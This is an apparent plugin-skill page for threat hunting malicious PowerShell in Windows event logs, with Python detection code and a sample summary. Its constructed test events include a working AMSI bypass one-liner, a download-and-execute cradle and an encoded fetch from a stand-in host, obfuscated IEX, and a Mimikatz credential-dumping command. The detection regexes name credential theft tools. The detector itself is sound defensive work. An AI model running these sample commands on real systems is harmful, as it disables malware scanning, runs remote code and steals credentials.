Hunts malicious PowerShell activity in Windows EVTX logs (events 4104/4103) by parsing script blocks, detecting obfuscation, AMSI bypasses, encoded payloads, credential dumps, and download cradles.
npx claudepluginhub killvxk/cybersecurity-skills-zh

This skill uses the workspace's default tool permissions.
PowerShell Script Block Logging (Event ID 4104) records the full text of every script block executed on a Windows endpoint, logged as the engine compiles it, so an obfuscated outer block and each inner block it later evaluates both appear in clear text. That makes 4104 the primary data source for hunting malicious PowerShell. Combined with Module Logging (Event ID 4103) and process creation events, analysts can detect encoded commands, AMSI bypass patterns, download cradles, credential theft tools and fileless techniques even when the attacker stacks several layers of obfuscation.
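The detection logic described above, as an added example that is not the skill's own code. It assumes the 4104 records have already been pulled out of the EVTX file into dicts carrying the real EventData field names (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText); the sample records, the indicator regexes and the hypothetical helper names (hunt, reassemble, decode_encoded_commands, is_obfuscated) are constructed for this illustration. It also covers a caveat a hunter needs: PowerShell splits large scripts across several 4104 events that share a ScriptBlockId, so fragments must be reassembled in MessageNumber order before matching, and -EncodedCommand payloads must be base64/UTF-16LE decoded and scanned as well, or a cradle hidden in the blob is missed.

```python
"""Detection logic for PowerShell Script Block Logging (Event ID 4104) records."""
import base64
import re
from collections import defaultdict

# Indicator rules, keyed by the summary field they count. Case-insensitive because
# PowerShell is, and attackers mix case deliberately.
RULES = {
    "amsi_bypass_attempts": re.compile(
        r"amsiInitFailed|AmsiUtils|AmsiScanBuffer|amsiContext", re.I),
    "download_cradles": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
        r"Invoke-RestMethod|Start-BitsTransfer", re.I),
    "credential_access": re.compile(
        r"Invoke-Mimikatz|sekurlsa::|lsass|Invoke-Kerberoast|Get-GPPPassword", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the UTF-16LE plaintext of every -EncodedCommand payload in text."""
    decoded = []
    for m in ENCODED_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; leave it alone
    return decoded


def is_obfuscated(text):
    """Cheap heuristics for Invoke-Obfuscation style tricks."""
    # Backticks inside identifiers (I`E`X), ignoring real escapes such as `n and `t.
    ticks = len(re.findall(r"`(?![ntrab0])[A-Za-z]", text))
    char_codes = re.search(r"\[char\]\s*\d+", text, re.I)          # [char]73+[char]69...
    format_reorder = re.search(r"\{\d+\}\{\d+\}[^\n]*?-f\b", text)   # "{1}{0}" -f 'b','a'
    return ticks >= 2 or bool(char_codes) or bool(format_reorder)


def reassemble(events):
    """Join multi-part 4104 records (same ScriptBlockId) in MessageNumber order."""
    parts = defaultdict(list)
    for ev in events:
        parts[ev["ScriptBlockId"]].append(ev)
    return {
        sid: "".join(e["ScriptBlockText"]
                     for e in sorted(evs, key=lambda e: e["MessageNumber"]))
        for sid, evs in parts.items()
    }


def analyze_script(text):
    """Return ({indicator: bool}, decoded payloads) for one complete script block."""
    decoded = decode_encoded_commands(text)
    full = "\n".join([text, *decoded])  # scan the decoded payload too
    hits = {name: bool(rx.search(full)) for name, rx in RULES.items()}
    hits["encoded_commands"] = bool(decoded)
    hits["obfuscation"] = is_obfuscated(full)
    return hits, decoded


def hunt(events):
    """Summary in the shape of the tool's JSON output, plus per-script findings."""
    scripts = reassemble(events)
    summary = {"total_events": len(events), "script_blocks": len(scripts),
               "suspicious_events": 0}
    findings = []
    for sid, text in scripts.items():
        hits, decoded = analyze_script(text)
        for name, hit in hits.items():
            summary[name] = summary.get(name, 0) + int(hit)
        if any(hits.values()):
            summary["suspicious_events"] += 1
            findings.append({"ScriptBlockId": sid, "decoded": decoded,
                             "indicators": [n for n, h in hits.items() if h]})
    return summary, findings


# Constructed sample records in the shape of 4104 EventData fields (not real telemetry).
PAYLOAD = "Invoke-WebRequest http://example.invalid/b.ps1 -OutFile b.ps1"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    # Second fragment logged before the first: reassembly must sort, not just concatenate.
    {"ScriptBlockId": "c3", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "Client).DownloadString($u)"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$u = 'http://example.invalid/a.ps1'; IEX (New-Object Net.Web"},
    {"ScriptBlockId": "d4", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + ENC},
    {"ScriptBlockId": "e5", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"},
    {"ScriptBlockId": "f6", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "I`E`X ((\"{1}{0}{2}\" -f 'Pro','Get-','cess'))"},
]

if __name__ == "__main__":
    import json
    summary, findings = hunt(SAMPLE_EVENTS)
    print(json.dumps(summary, indent=2))
    for f in findings:
        print(f["ScriptBlockId"], f["indicators"], f["decoded"])
```

Counting per reassembled script block rather than per raw event is deliberate: a cradle split over two fragments is one finding, not two and not zero. The regexes are starting points, not a signature set; tune them against the baseline of your own administrative scripts before trusting the suspicious_events count.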
Hunts malicious PowerShell in EVTX files via Script Block (Event 4104) and Module Logging (Event 4103), detecting AMSI bypasses, obfuscation, encoded payloads, credential dumps, and download cradles.
Parses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.
Detects suspicious PowerShell execution patterns like encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasions. Useful for threat hunting in EDR/SIEM environments with Sysmon.
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}